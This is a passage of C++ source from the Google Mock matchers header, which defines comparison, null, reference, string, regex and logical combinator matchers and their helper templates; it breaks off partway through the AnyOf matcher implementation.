template <typename T> class SafeMatcherCastImpl { public: // This overload handles polymorphic matchers and values only since // monomorphic matchers are handled by the next one. template <typename M> static inline Matcher<T> Cast(const M& polymorphic_matcher_or_value) { return internal::MatcherCastImpl<T, M>::Cast(polymorphic_matcher_or_value); } // This overload handles monomorphic matchers. // // In general, if type T can be implicitly converted to type U, we can // safely convert a Matcher<U> to a Matcher<T> (i.e. Matcher is // contravariant): just keep a copy of the original Matcher<U>, convert the // argument from type T to U, and then pass it to the underlying Matcher<U>. // The only exception is when U is a reference and T is not, as the // underlying Matcher<U> may be interested in the argument's address, which // is not preserved in the conversion from T to U. template <typename U> static inline Matcher<T> Cast(const Matcher<U>& matcher) { // Enforce that T can be implicitly converted to U. GTEST_COMPILE_ASSERT_((internal::ImplicitlyConvertible<T, U>::value), T_must_be_implicitly_convertible_to_U); // Enforce that we are not converting a non-reference type T to a reference // type U. GTEST_COMPILE_ASSERT_( internal::is_reference<T>::value || !internal::is_reference<U>::value, cannot_convert_non_referentce_arg_to_reference); // In case both T and U are arithmetic types, enforce that the // conversion is not lossy. 
typedef GTEST_REMOVE_REFERENCE_AND_CONST_(T) RawT; typedef GTEST_REMOVE_REFERENCE_AND_CONST_(U) RawU; const bool kTIsOther = GMOCK_KIND_OF_(RawT) == internal::kOther; const bool kUIsOther = GMOCK_KIND_OF_(RawU) == internal::kOther; GTEST_COMPILE_ASSERT_( kTIsOther || kUIsOther || (internal::LosslessArithmeticConvertible<RawT, RawU>::value), conversion_of_arithmetic_types_must_be_lossless); return MatcherCast<T>(matcher); } }; template <typename T, typename M> inline Matcher<T> SafeMatcherCast(const M& polymorphic_matcher) { return SafeMatcherCastImpl<T>::Cast(polymorphic_matcher); } // A<T>() returns a matcher that matches any value of type T. template <typename T> Matcher<T> A(); // Anything inside the 'internal' namespace IS INTERNAL IMPLEMENTATION // and MUST NOT BE USED IN USER CODE!!! namespace internal { // If the explanation is not empty, prints it to the ostream. inline void PrintIfNotEmpty(const internal::string& explanation, ::std::ostream* os) { if (explanation != "" && os != NULL) { *os << ", " << explanation; } } // Returns true if the given type name is easy to read by a human. // This is used to decide whether printing the type of a value might // be helpful. inline bool IsReadableTypeName(const string& type_name) { // We consider a type name readable if it's short or doesn't contain // a template or function type. return (type_name.length() <= 20 || type_name.find_first_of("<(") == string::npos); } // Matches the value against the given matcher, prints the value and explains // the match result to the listener. Returns the match result. // 'listener' must not be NULL. // Value cannot be passed by const reference, because some matchers take a // non-const argument. template <typename Value, typename T> bool MatchPrintAndExplain(Value& value, const Matcher<T>& matcher, MatchResultListener* listener) { if (!listener->IsInterested()) { // If the listener is not interested, we do not need to construct the // inner explanation. 
return matcher.Matches(value); } StringMatchResultListener inner_listener; const bool match = matcher.MatchAndExplain(value, &inner_listener); UniversalPrint(value, listener->stream()); #if GTEST_HAS_RTTI const string& type_name = GetTypeName<Value>(); if (IsReadableTypeName(type_name)) *listener->stream() << " (of type " << type_name << ")"; #endif PrintIfNotEmpty(inner_listener.str(), listener->stream()); return match; } // An internal helper class for doing compile-time loop on a tuple's // fields. template <size_t N> class TuplePrefix { public: // TuplePrefix<N>::Matches(matcher_tuple, value_tuple) returns true // iff the first N fields of matcher_tuple matches the first N // fields of value_tuple, respectively. template <typename MatcherTuple, typename ValueTuple> static bool Matches(const MatcherTuple& matcher_tuple, const ValueTuple& value_tuple) { return TuplePrefix<N - 1>::Matches(matcher_tuple, value_tuple) && get<N - 1>(matcher_tuple).Matches(get<N - 1>(value_tuple)); } // TuplePrefix<N>::ExplainMatchFailuresTo(matchers, values, os) // describes failures in matching the first N fields of matchers // against the first N fields of values. If there is no failure, // nothing will be streamed to os. template <typename MatcherTuple, typename ValueTuple> static void ExplainMatchFailuresTo(const MatcherTuple& matchers, const ValueTuple& values, ::std::ostream* os) { // First, describes failures in the first N - 1 fields. TuplePrefix<N - 1>::ExplainMatchFailuresTo(matchers, values, os); // Then describes the failure (if any) in the (N - 1)-th (0-based) // field. typename tuple_element<N - 1, MatcherTuple>::type matcher = get<N - 1>(matchers); typedef typename tuple_element<N - 1, ValueTuple>::type Value; Value value = get<N - 1>(values); StringMatchResultListener listener; if (!matcher.MatchAndExplain(value, &listener)) { // TODO(wan): include in the message the name of the parameter // as used in MOCK_METHOD*() when possible. 
*os << " Expected arg #" << N - 1 << ": "; get<N - 1>(matchers).DescribeTo(os); *os << "\n Actual: "; // We remove the reference in type Value to prevent the // universal printer from printing the address of value, which // isn't interesting to the user most of the time. The // matcher's MatchAndExplain() method handles the case when // the address is interesting. internal::UniversalPrint(value, os); PrintIfNotEmpty(listener.str(), os); *os << "\n"; } } }; // The base case. template <> class TuplePrefix<0> { public: template <typename MatcherTuple, typename ValueTuple> static bool Matches(const MatcherTuple& /* matcher_tuple */, const ValueTuple& /* value_tuple */) { return true; } template <typename MatcherTuple, typename ValueTuple> static void ExplainMatchFailuresTo(const MatcherTuple& /* matchers */, const ValueTuple& /* values */, ::std::ostream* /* os */) {} }; // TupleMatches(matcher_tuple, value_tuple) returns true iff all // matchers in matcher_tuple match the corresponding fields in // value_tuple. It is a compiler error if matcher_tuple and // value_tuple have different number of fields or incompatible field // types. template <typename MatcherTuple, typename ValueTuple> bool TupleMatches(const MatcherTuple& matcher_tuple, const ValueTuple& value_tuple) { // Makes sure that matcher_tuple and value_tuple have the same // number of fields. GTEST_COMPILE_ASSERT_(tuple_size<MatcherTuple>::value == tuple_size<ValueTuple>::value, matcher_and_value_have_different_numbers_of_fields); return TuplePrefix<tuple_size<ValueTuple>::value>:: Matches(matcher_tuple, value_tuple); } // Describes failures in matching matchers against values. If there // is no failure, nothing will be streamed to os. 
template <typename MatcherTuple, typename ValueTuple> void ExplainMatchFailureTupleTo(const MatcherTuple& matchers, const ValueTuple& values, ::std::ostream* os) { TuplePrefix<tuple_size<MatcherTuple>::value>::ExplainMatchFailuresTo( matchers, values, os); } // TransformTupleValues and its helper. // // TransformTupleValuesHelper hides the internal machinery that // TransformTupleValues uses to implement a tuple traversal. template <typename Tuple, typename Func, typename OutIter> class TransformTupleValuesHelper { private: typedef ::testing::tuple_size<Tuple> TupleSize; public: // For each member of tuple 't', taken in order, evaluates '*out++ = f(t)'. // Returns the final value of 'out' in case the caller needs it. static OutIter Run(Func f, const Tuple& t, OutIter out) { return IterateOverTuple<Tuple, TupleSize::value>()(f, t, out); } private: template <typename Tup, size_t kRemainingSize> struct IterateOverTuple { OutIter operator() (Func f, const Tup& t, OutIter out) const { *out++ = f(::testing::get<TupleSize::value - kRemainingSize>(t)); return IterateOverTuple<Tup, kRemainingSize - 1>()(f, t, out); } }; template <typename Tup> struct IterateOverTuple<Tup, 0> { OutIter operator() (Func /* f */, const Tup& /* t */, OutIter out) const { return out; } }; }; // Successively invokes 'f(element)' on each element of the tuple 't', // appending each result to the 'out' iterator. Returns the final value // of 'out'. template <typename Tuple, typename Func, typename OutIter> OutIter TransformTupleValues(Func f, const Tuple& t, OutIter out) { return TransformTupleValuesHelper<Tuple, Func, OutIter>::Run(f, t, out); } // Implements A<T>(). 
template <typename T> class AnyMatcherImpl : public MatcherInterface<T> { public: virtual bool MatchAndExplain( T /* x */, MatchResultListener* /* listener */) const { return true; } virtual void DescribeTo(::std::ostream* os) const { *os << "is anything"; } virtual void DescribeNegationTo(::std::ostream* os) const { // This is mostly for completeness' safe, as it's not very useful // to write Not(A<bool>()). However we cannot completely rule out // such a possibility, and it doesn't hurt to be prepared. *os << "never matches"; } }; // Implements _, a matcher that matches any value of any // type. This is a polymorphic matcher, so we need a template type // conversion operator to make it appearing as a Matcher<T> for any // type T. class AnythingMatcher { public: template <typename T> operator Matcher<T>() const { return A<T>(); } }; // Implements a matcher that compares a given value with a // pre-supplied value using one of the ==, <=, <, etc, operators. The // two values being compared don't have to have the same type. // // The matcher defined here is polymorphic (for example, Eq(5) can be // used to match an int, a short, a double, etc). Therefore we use // a template type conversion operator in the implementation. // // We define this as a macro in order to eliminate duplicated source // code. // // The following template definition assumes that the Rhs parameter is // a "bare" type (i.e. neither 'const T' nor 'T&'). 
#define GMOCK_IMPLEMENT_COMPARISON_MATCHER_( \
    name, op, relation, negated_relation) \
  template <typename Rhs> class name##Matcher { \
   public: \
    explicit name##Matcher(const Rhs& rhs) : rhs_(rhs) {} \
    template <typename Lhs> \
    operator Matcher<Lhs>() const { \
      return MakeMatcher(new Impl<Lhs>(rhs_)); \
    } \
   private: \
    template <typename Lhs> \
    class Impl : public MatcherInterface<Lhs> { \
     public: \
      explicit Impl(const Rhs& rhs) : rhs_(rhs) {} \
      virtual bool MatchAndExplain(\
          Lhs lhs, MatchResultListener* /* listener */) const { \
        return lhs op rhs_; \
      } \
      virtual void DescribeTo(::std::ostream* os) const { \
        *os << relation " "; \
        UniversalPrint(rhs_, os); \
      } \
      virtual void DescribeNegationTo(::std::ostream* os) const { \
        *os << negated_relation " "; \
        UniversalPrint(rhs_, os); \
      } \
     private: \
      Rhs rhs_; \
      GTEST_DISALLOW_ASSIGN_(Impl); \
    }; \
    Rhs rhs_; \
    GTEST_DISALLOW_ASSIGN_(name##Matcher); \
  }

// Implements Eq(v), Ge(v), Gt(v), Le(v), Lt(v), and Ne(v)
// respectively.
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Eq, ==, "is equal to", "isn't equal to");
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Ge, >=, "is >=", "isn't >=");
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Gt, >, "is >", "isn't >");
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Le, <=, "is <=", "isn't <=");
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Lt, <, "is <", "isn't <");
GMOCK_IMPLEMENT_COMPARISON_MATCHER_(Ne, !=, "isn't equal to", "is equal to");

#undef GMOCK_IMPLEMENT_COMPARISON_MATCHER_

// Implements the polymorphic IsNull() matcher, which matches any raw or smart
// pointer that is NULL.
class IsNullMatcher {
 public:
  template <typename Pointer>
  bool MatchAndExplain(const Pointer& p,
                       MatchResultListener* /* listener */) const {
    return GetRawPointer(p) == NULL;
  }

  void DescribeTo(::std::ostream* os) const { *os << "is NULL"; }
  void DescribeNegationTo(::std::ostream* os) const {
    *os << "isn't NULL";
  }
};

// Implements the polymorphic NotNull() matcher, which matches any raw or smart
// pointer that is not NULL.
class NotNullMatcher {
 public:
  template <typename Pointer>
  bool MatchAndExplain(const Pointer& p,
                       MatchResultListener* /* listener */) const {
    return GetRawPointer(p) != NULL;
  }

  void DescribeTo(::std::ostream* os) const { *os << "isn't NULL"; }
  void DescribeNegationTo(::std::ostream* os) const {
    *os << "is NULL";
  }
};

// Ref(variable) matches any argument that is a reference to
// 'variable'.  This matcher is polymorphic as it can match any
// super type of the type of 'variable'.
//
// The RefMatcher template class implements Ref(variable).  It can
// only be instantiated with a reference type.  This prevents a user
// from mistakenly using Ref(x) to match a non-reference function
// argument.  For example, the following will righteously cause a
// compiler error:
//
//   int n;
//   Matcher<int> m1 = Ref(n);   // This won't compile.
//   Matcher<int&> m2 = Ref(n);  // This will compile.
template <typename T>
class RefMatcher;

template <typename T>
class RefMatcher<T&> {
  // Google Mock is a generic framework and thus needs to support
  // mocking any function types, including those that take non-const
  // reference arguments.  Therefore the template parameter T (and
  // Super below) can be instantiated to either a const type or a
  // non-const type.
 public:
  // RefMatcher() takes a T& instead of const T&, as we want the
  // compiler to catch using Ref(const_value) as a matcher for a
  // non-const reference.
  explicit RefMatcher(T& x) : object_(x) {}  // NOLINT

  template <typename Super>
  operator Matcher<Super&>() const {
    // By passing object_ (type T&) to Impl(), which expects a Super&,
    // we make sure that Super is a super type of T.  In particular,
    // this catches using Ref(const_value) as a matcher for a
    // non-const reference, as you cannot implicitly convert a const
    // reference to a non-const reference.
    return MakeMatcher(new Impl<Super>(object_));
  }

 private:
  template <typename Super>
  class Impl : public MatcherInterface<Super&> {
   public:
    explicit Impl(Super& x) : object_(x) {}  // NOLINT

    // MatchAndExplain() takes a Super& (as opposed to const Super&)
    // in order to match the interface MatcherInterface<Super&>.
    virtual bool MatchAndExplain(
        Super& x, MatchResultListener* listener) const {
      *listener << "which is located @" << static_cast<const void*>(&x);
      // Matching is by identity (address), not by value equality.
      return &x == &object_;
    }

    virtual void DescribeTo(::std::ostream* os) const {
      *os << "references the variable ";
      UniversalPrinter<Super&>::Print(object_, os);
    }

    virtual void DescribeNegationTo(::std::ostream* os) const {
      *os << "does not reference the variable ";
      UniversalPrinter<Super&>::Print(object_, os);
    }

   private:
    const Super& object_;

    GTEST_DISALLOW_ASSIGN_(Impl);
  };

  T& object_;

  GTEST_DISALLOW_ASSIGN_(RefMatcher);
};

// Polymorphic helper functions for narrow and wide string matchers.
inline bool CaseInsensitiveCStringEquals(const char* lhs, const char* rhs) {
  return String::CaseInsensitiveCStringEquals(lhs, rhs);
}

inline bool CaseInsensitiveCStringEquals(const wchar_t* lhs,
                                         const wchar_t* rhs) {
  return String::CaseInsensitiveWideCStringEquals(lhs, rhs);
}

// String comparison for narrow or wide strings that can have embedded NUL
// characters.
template <typename StringType>
bool CaseInsensitiveStringEquals(const StringType& s1,
                                 const StringType& s2) {
  // Are the heads equal?
  if (!CaseInsensitiveCStringEquals(s1.c_str(), s2.c_str())) {
    return false;
  }

  // Skip the equal heads.
  const typename StringType::value_type nul = 0;
  const size_t i1 = s1.find(nul), i2 = s2.find(nul);

  // Are we at the end of either s1 or s2?
  if (i1 == StringType::npos || i2 == StringType::npos) {
    return i1 == i2;
  }

  // Are the tails equal?  Recurse past the embedded NUL.
  return CaseInsensitiveStringEquals(s1.substr(i1 + 1), s2.substr(i2 + 1));
}

// String matchers.

// Implements equality-based string matchers like StrEq, StrCaseNe, and etc.
template <typename StringType>
class StrEqualityMatcher {
 public:
  StrEqualityMatcher(const StringType& str, bool expect_eq,
                     bool case_sensitive)
      : string_(str), expect_eq_(expect_eq), case_sensitive_(case_sensitive) {}

  // Accepts pointer types, particularly:
  //   const char*
  //   char*
  //   const wchar_t*
  //   wchar_t*
  template <typename CharType>
  bool MatchAndExplain(CharType* s, MatchResultListener* listener) const {
    if (s == NULL) {
      // A NULL C string is never equal to any string, so it matches
      // only when inequality is expected (e.g. StrNe, StrCaseNe).
      return !expect_eq_;
    }
    return MatchAndExplain(StringType(s), listener);
  }

  // Matches anything that can convert to StringType.
  //
  // This is a template, not just a plain function with const StringType&,
  // because StringPiece has some interfering non-explicit constructors.
  template <typename MatcheeStringType>
  bool MatchAndExplain(const MatcheeStringType& s,
                       MatchResultListener* /* listener */) const {
    const StringType& s2(s);
    const bool eq = case_sensitive_ ? s2 == string_ :
        CaseInsensitiveStringEquals(s2, string_);
    return expect_eq_ == eq;
  }

  void DescribeTo(::std::ostream* os) const {
    DescribeToHelper(expect_eq_, os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    DescribeToHelper(!expect_eq_, os);
  }

 private:
  // Shared by DescribeTo() and DescribeNegationTo(); the only
  // difference between the two is the polarity of expect_eq.
  void DescribeToHelper(bool expect_eq, ::std::ostream* os) const {
    *os << (expect_eq ? "is " : "isn't ");
    *os << "equal to ";
    if (!case_sensitive_) {
      *os << "(ignoring case) ";
    }
    UniversalPrint(string_, os);
  }

  const StringType string_;
  const bool expect_eq_;
  const bool case_sensitive_;

  GTEST_DISALLOW_ASSIGN_(StrEqualityMatcher);
};

// Implements the polymorphic HasSubstr(substring) matcher, which
// can be used as a Matcher<T> as long as T can be converted to a
// string.
template <typename StringType>
class HasSubstrMatcher {
 public:
  explicit HasSubstrMatcher(const StringType& substring)
      : substring_(substring) {}

  // Accepts pointer types, particularly:
  //   const char*
  //   char*
  //   const wchar_t*
  //   wchar_t*
  template <typename CharType>
  bool MatchAndExplain(CharType* s, MatchResultListener* listener) const {
    return s != NULL && MatchAndExplain(StringType(s), listener);
  }

  // Matches anything that can convert to StringType.
  //
  // This is a template, not just a plain function with const StringType&,
  // because StringPiece has some interfering non-explicit constructors.
  template <typename MatcheeStringType>
  bool MatchAndExplain(const MatcheeStringType& s,
                       MatchResultListener* /* listener */) const {
    const StringType& s2(s);
    return s2.find(substring_) != StringType::npos;
  }

  // Describes what this matcher matches.
  void DescribeTo(::std::ostream* os) const {
    *os << "has substring ";
    UniversalPrint(substring_, os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "has no substring ";
    UniversalPrint(substring_, os);
  }

 private:
  const StringType substring_;

  GTEST_DISALLOW_ASSIGN_(HasSubstrMatcher);
};

// Implements the polymorphic StartsWith(substring) matcher, which
// can be used as a Matcher<T> as long as T can be converted to a
// string.
template <typename StringType>
class StartsWithMatcher {
 public:
  explicit StartsWithMatcher(const StringType& prefix) : prefix_(prefix) {
  }

  // Accepts pointer types, particularly:
  //   const char*
  //   char*
  //   const wchar_t*
  //   wchar_t*
  template <typename CharType>
  bool MatchAndExplain(CharType* s, MatchResultListener* listener) const {
    return s != NULL && MatchAndExplain(StringType(s), listener);
  }

  // Matches anything that can convert to StringType.
  //
  // This is a template, not just a plain function with const StringType&,
  // because StringPiece has some interfering non-explicit constructors.
  template <typename MatcheeStringType>
  bool MatchAndExplain(const MatcheeStringType& s,
                       MatchResultListener* /* listener */) const {
    const StringType& s2(s);
    return s2.length() >= prefix_.length() &&
        s2.substr(0, prefix_.length()) == prefix_;
  }

  void DescribeTo(::std::ostream* os) const {
    *os << "starts with ";
    UniversalPrint(prefix_, os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "doesn't start with ";
    UniversalPrint(prefix_, os);
  }

 private:
  const StringType prefix_;

  GTEST_DISALLOW_ASSIGN_(StartsWithMatcher);
};

// Implements the polymorphic EndsWith(substring) matcher, which
// can be used as a Matcher<T> as long as T can be converted to a
// string.
template <typename StringType>
class EndsWithMatcher {
 public:
  explicit EndsWithMatcher(const StringType& suffix) : suffix_(suffix) {}

  // Accepts pointer types, particularly:
  //   const char*
  //   char*
  //   const wchar_t*
  //   wchar_t*
  template <typename CharType>
  bool MatchAndExplain(CharType* s, MatchResultListener* listener) const {
    return s != NULL && MatchAndExplain(StringType(s), listener);
  }

  // Matches anything that can convert to StringType.
  //
  // This is a template, not just a plain function with const StringType&,
  // because StringPiece has some interfering non-explicit constructors.
  template <typename MatcheeStringType>
  bool MatchAndExplain(const MatcheeStringType& s,
                       MatchResultListener* /* listener */) const {
    const StringType& s2(s);
    return s2.length() >= suffix_.length() &&
        s2.substr(s2.length() - suffix_.length()) == suffix_;
  }

  void DescribeTo(::std::ostream* os) const {
    *os << "ends with ";
    UniversalPrint(suffix_, os);
  }

  void DescribeNegationTo(::std::ostream* os) const {
    *os << "doesn't end with ";
    UniversalPrint(suffix_, os);
  }

 private:
  const StringType suffix_;

  GTEST_DISALLOW_ASSIGN_(EndsWithMatcher);
};

// Implements polymorphic matchers MatchesRegex(regex) and
// ContainsRegex(regex), which can be used as a Matcher<T> as long as
// T can be converted to a string.
class MatchesRegexMatcher { public: MatchesRegexMatcher(const RE* regex, bool full_match) : regex_(regex), full_match_(full_match) {} // Accepts pointer types, particularly: // const char* // char* // const wchar_t* // wchar_t* template <typename CharType> bool MatchAndExplain(CharType* s, MatchResultListener* listener) const { return s != NULL && MatchAndExplain(internal::string(s), listener); } // Matches anything that can convert to internal::string. // // This is a template, not just a plain function with const internal::string&, // because StringPiece has some interfering non-explicit constructors. template <class MatcheeStringType> bool MatchAndExplain(const MatcheeStringType& s, MatchResultListener* /* listener */) const { const internal::string& s2(s); return full_match_ ? RE::FullMatch(s2, *regex_) : RE::PartialMatch(s2, *regex_); } void DescribeTo(::std::ostream* os) const { *os << (full_match_ ? "matches" : "contains") << " regular expression "; UniversalPrinter<internal::string>::Print(regex_->pattern(), os); } void DescribeNegationTo(::std::ostream* os) const { *os << "doesn't " << (full_match_ ? "match" : "contain") << " regular expression "; UniversalPrinter<internal::string>::Print(regex_->pattern(), os); } private: const internal::linked_ptr<const RE> regex_; const bool full_match_; GTEST_DISALLOW_ASSIGN_(MatchesRegexMatcher); }; // Implements a matcher that compares the two fields of a 2-tuple // using one of the ==, <=, <, etc, operators. The two fields being // compared don't have to have the same type. // // The matcher defined here is polymorphic (for example, Eq() can be // used to match a tuple<int, short>, a tuple<const long&, double>, // etc). Therefore we use a template type conversion operator in the // implementation. // // We define this as a macro in order to eliminate duplicated source // code. 
#define GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(name, op, relation) \ class name##2Matcher { \ public: \ template <typename T1, typename T2> \ operator Matcher< ::testing::tuple<T1, T2> >() const { \ return MakeMatcher(new Impl< ::testing::tuple<T1, T2> >); \ } \ template <typename T1, typename T2> \ operator Matcher<const ::testing::tuple<T1, T2>&>() const { \ return MakeMatcher(new Impl<const ::testing::tuple<T1, T2>&>); \ } \ private: \ template <typename Tuple> \ class Impl : public MatcherInterface<Tuple> { \ public: \ virtual bool MatchAndExplain( \ Tuple args, \ MatchResultListener* /* listener */) const { \ return ::testing::get<0>(args) op ::testing::get<1>(args); \ } \ virtual void DescribeTo(::std::ostream* os) const { \ *os << "are " relation; \ } \ virtual void DescribeNegationTo(::std::ostream* os) const { \ *os << "aren't " relation; \ } \ }; \ } // Implements Eq(), Ge(), Gt(), Le(), Lt(), and Ne() respectively. GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(Eq, ==, "an equal pair"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Ge, >=, "a pair where the first >= the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Gt, >, "a pair where the first > the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Le, <=, "a pair where the first <= the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_( Lt, <, "a pair where the first < the second"); GMOCK_IMPLEMENT_COMPARISON2_MATCHER_(Ne, !=, "an unequal pair"); #undef GMOCK_IMPLEMENT_COMPARISON2_MATCHER_ // Implements the Not(...) matcher for a particular argument type T. // We do not nest it inside the NotMatcher class template, as that // will prevent different instantiations of NotMatcher from sharing // the same NotMatcherImpl<T> class. 
template <typename T>
class NotMatcherImpl : public MatcherInterface<T> {
 public:
  explicit NotMatcherImpl(const Matcher<T>& matcher)
      : matcher_(matcher) {}

  // Matches x iff the inner matcher does NOT match it.  Any
  // explanation the inner matcher streams is forwarded unchanged.
  virtual bool MatchAndExplain(T x, MatchResultListener* listener) const {
    return !matcher_.MatchAndExplain(x, listener);
  }

  // The description of Not(m) is m's negated description, and vice
  // versa.
  virtual void DescribeTo(::std::ostream* os) const {
    matcher_.DescribeNegationTo(os);
  }

  virtual void DescribeNegationTo(::std::ostream* os) const {
    matcher_.DescribeTo(os);
  }

 private:
  const Matcher<T> matcher_;

  GTEST_DISALLOW_ASSIGN_(NotMatcherImpl);
};

// Implements the Not(m) matcher, which matches a value that doesn't
// match matcher m.
template <typename InnerMatcher>
class NotMatcher {
 public:
  explicit NotMatcher(InnerMatcher matcher) : matcher_(matcher) {}

  // This template type conversion operator allows Not(m) to be used
  // to match any type m can match.
  template <typename T>
  operator Matcher<T>() const {
    return Matcher<T>(new NotMatcherImpl<T>(SafeMatcherCast<T>(matcher_)));
  }

 private:
  InnerMatcher matcher_;

  GTEST_DISALLOW_ASSIGN_(NotMatcher);
};

// Implements the AllOf(m1, m2) matcher for a particular argument type
// T. We do not nest it inside the BothOfMatcher class template, as
// that will prevent different instantiations of BothOfMatcher from
// sharing the same BothOfMatcherImpl<T> class.
template <typename T>
class BothOfMatcherImpl : public MatcherInterface<T> {
 public:
  BothOfMatcherImpl(const Matcher<T>& matcher1, const Matcher<T>& matcher2)
      : matcher1_(matcher1), matcher2_(matcher2) {}

  virtual void DescribeTo(::std::ostream* os) const {
    *os << "(";
    matcher1_.DescribeTo(os);
    *os << ") and (";
    matcher2_.DescribeTo(os);
    *os << ")";
  }

  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "(";
    matcher1_.DescribeNegationTo(os);
    *os << ") or (";
    matcher2_.DescribeNegationTo(os);
    *os << ")";
  }

  virtual bool MatchAndExplain(T x, MatchResultListener* listener) const {
    // If either matcher1_ or matcher2_ doesn't match x, we only need
    // to explain why one of them fails.
    StringMatchResultListener listener1;
    if (!matcher1_.MatchAndExplain(x, &listener1)) {
      *listener << listener1.str();
      return false;
    }

    StringMatchResultListener listener2;
    if (!matcher2_.MatchAndExplain(x, &listener2)) {
      *listener << listener2.str();
      return false;
    }

    // Otherwise we need to explain why *both* of them match.
    const internal::string s1 = listener1.str();
    const internal::string s2 = listener2.str();

    // Join the two explanations with ", and ", omitting whichever is
    // empty.
    if (s1 == "") {
      *listener << s2;
    } else {
      *listener << s1;
      if (s2 != "") {
        *listener << ", and " << s2;
      }
    }
    return true;
  }

 private:
  const Matcher<T> matcher1_;
  const Matcher<T> matcher2_;

  GTEST_DISALLOW_ASSIGN_(BothOfMatcherImpl);
};

#if GTEST_LANG_CXX11
// MatcherList provides mechanisms for storing a variable number of matchers in
// a list structure (ListType) and creating a combining matcher from such a
// list.
// The template is defined recursively using the following template paramters:
//   * kSize is the length of the MatcherList.
//   * Head is the type of the first matcher of the list.
//   * Tail denotes the types of the remaining matchers of the list.
template <int kSize, typename Head, typename... Tail>
struct MatcherList {
  typedef MatcherList<kSize - 1, Tail...> MatcherListTail;
  typedef ::std::pair<Head, typename MatcherListTail::ListType> ListType;

  // BuildList stores variadic type values in a nested pair structure.
  // Example:
  // MatcherList<3, int, string, float>::BuildList(5, "foo", 2.0) will return
  // the corresponding result of type pair<int, pair<string, float>>.
  static ListType BuildList(const Head& matcher, const Tail&... tail) {
    return ListType(matcher, MatcherListTail::BuildList(tail...));
  }

  // CreateMatcher<T> creates a Matcher<T> from a given list of matchers (built
  // by BuildList()). CombiningMatcher<T> is used to combine the matchers of the
  // list. CombiningMatcher<T> must implement MatcherInterface<T> and have a
  // constructor taking two Matcher<T>s as input.
  template <typename T, template <typename /* T */> class CombiningMatcher>
  static Matcher<T> CreateMatcher(const ListType& matchers) {
    return Matcher<T>(new CombiningMatcher<T>(
        SafeMatcherCast<T>(matchers.first),
        MatcherListTail::template CreateMatcher<T, CombiningMatcher>(
            matchers.second)));
  }
};

// The following defines the base case for the recursive definition of
// MatcherList.  (The recursion bottoms out at two matchers, which is
// exactly what a CombiningMatcher's constructor takes.)
template <typename Matcher1, typename Matcher2>
struct MatcherList<2, Matcher1, Matcher2> {
  typedef ::std::pair<Matcher1, Matcher2> ListType;

  static ListType BuildList(const Matcher1& matcher1,
                            const Matcher2& matcher2) {
    return ::std::pair<Matcher1, Matcher2>(matcher1, matcher2);
  }

  template <typename T, template <typename /* T */> class CombiningMatcher>
  static Matcher<T> CreateMatcher(const ListType& matchers) {
    return Matcher<T>(new CombiningMatcher<T>(
        SafeMatcherCast<T>(matchers.first),
        SafeMatcherCast<T>(matchers.second)));
  }
};

// VariadicMatcher is used for the variadic implementation of
// AllOf(m_1, m_2, ...) and AnyOf(m_1, m_2, ...).
// CombiningMatcher<T> is used to recursively combine the provided matchers
// (of type Args...).
template <template <typename T> class CombiningMatcher, typename... Args>
class VariadicMatcher {
 public:
  VariadicMatcher(const Args&... matchers)  // NOLINT
      : matchers_(MatcherListType::BuildList(matchers...)) {}

  // This template type conversion operator allows an
  // VariadicMatcher<Matcher1, Matcher2...> object to match any type that
  // all of the provided matchers (Matcher1, Matcher2, ...) can match.
  template <typename T>
  operator Matcher<T>() const {
    return MatcherListType::template CreateMatcher<T, CombiningMatcher>(
        matchers_);
  }

 private:
  typedef MatcherList<sizeof...(Args), Args...> MatcherListType;

  const typename MatcherListType::ListType matchers_;

  GTEST_DISALLOW_ASSIGN_(VariadicMatcher);
};

template <typename... Args>
using AllOfMatcher = VariadicMatcher<BothOfMatcherImpl, Args...>;

#endif  // GTEST_LANG_CXX11

// Used for implementing the AllOf(m_1, ..., m_n) matcher, which
// matches a value that matches all of the matchers m_1, ..., and m_n.
template <typename Matcher1, typename Matcher2>
class BothOfMatcher {
 public:
  BothOfMatcher(Matcher1 matcher1, Matcher2 matcher2)
      : matcher1_(matcher1), matcher2_(matcher2) {}

  // This template type conversion operator allows a
  // BothOfMatcher<Matcher1, Matcher2> object to match any type that
  // both Matcher1 and Matcher2 can match.
  template <typename T>
  operator Matcher<T>() const {
    return Matcher<T>(new BothOfMatcherImpl<T>(SafeMatcherCast<T>(matcher1_),
                                               SafeMatcherCast<T>(matcher2_)));
  }

 private:
  Matcher1 matcher1_;
  Matcher2 matcher2_;

  GTEST_DISALLOW_ASSIGN_(BothOfMatcher);
};

// Implements the AnyOf(m1, m2) matcher for a particular argument type
// T. We do not nest it inside the AnyOfMatcher class template, as
// that will prevent different instantiations of AnyOfMatcher from
// sharing the same EitherOfMatcherImpl<T> class.
template <typename T>
class EitherOfMatcherImpl : public MatcherInterface<T> {
 public:
  EitherOfMatcherImpl(const Matcher<T>& matcher1, const Matcher<T>& matcher2)
      : matcher1_(matcher1), matcher2_(matcher2) {}

  virtual void DescribeTo(::std::ostream* os) const {
    *os << "(";
    matcher1_.DescribeTo(os);
    *os << ") or (";
    matcher2_.DescribeTo(os);
    *os << ")";
  }

  virtual void DescribeNegationTo(::std::ostream* os) const {
    *os << "(";
    matcher1_.DescribeNegationTo(os);
    *os << ") and (";
    matcher2_.DescribeNegationTo(os);
    *os << ")";
  }

  virtual bool MatchAndExplain(T x, MatchResultListener* listener) const {
    // If either matcher1_ or matcher2_ matches x, we just need to
    // explain why *one* of them matches.
    StringMatchResultListener listener1;
    if (matcher1_.MatchAndExplain(x, &listener1)) {
      *listener << listener1.str();
      return true;
    }

    StringMatchResultListener listener2;
    if (matcher2_.MatchAndExplain(x, &listener2)) {
      *listener << listener2.str();
      return true;
    }

    // Otherwise we need to explain why *both* of them fail.
    const internal::string s1 = listener1.str();
